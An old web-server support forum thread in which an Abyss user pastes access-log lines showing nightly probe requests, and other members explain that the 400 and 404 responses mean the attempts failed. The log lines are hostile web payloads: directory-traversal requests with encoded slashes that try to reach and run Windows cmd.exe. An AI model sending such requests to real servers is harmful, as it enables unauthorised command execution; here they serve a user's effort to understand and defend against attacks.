FAQ  |  Search  |  Register  |  Profile  |  Log in to check your private messages  |  Log in
Hacking Abyss server

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
mekp21
-


Joined: 27 Mar 2003
Posts: 2
PostPosted: Tue Apr 22, 2003 11:10 pm    Post subject: Hacking Abyss server Reply with quote
I have had abyss running for the past week and love it. But checking ther access log reveals something odd

24.205.10.212 - - [21/Apr/2003:21:49:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:21:49:39 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:49 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:49 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
68.36.130.141 - - [22/Apr/2003:01:00:08 +1133] "OPTIONS / HTTP/1.1" 200 259
24.93.117.108 - - [22/Apr/2003:01:01:04 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:04 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:08 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:14 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:18 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:21 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:26 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:36 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108

is just a sample of the log. It seems to happen every night around the same time and I realize the 400 or the 404 at the end of the line means they didnt get through but what are the chances that they will eventually?
Jason
Back to top View user's profile Send private message
feamsr00
-


Joined: 04 Jun 2002
Posts: 138
Location: Phila PA
PostPosted: Tue Apr 22, 2003 11:31 pm    Post subject: Reply with quote
It means absoloutly nothng to you. As long as you run abyss, you are not affected.
Back to top View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
WhiteDevil
-


Joined: 07 Oct 2002
Posts: 74
Location: United Kingdom
PostPosted: Wed Apr 23, 2003 9:06 am    Post subject: Reply with quote
everywhere you are getting the number 404 come up it means that the person requesting items from your server was denied them...
Error 400 means Bad Request so the "hacker" still didnt get what they were after...

if you ever get error 200, 201 or 202 then post here, because someone has found a major security risk...
_________________
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address MSN Messenger
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group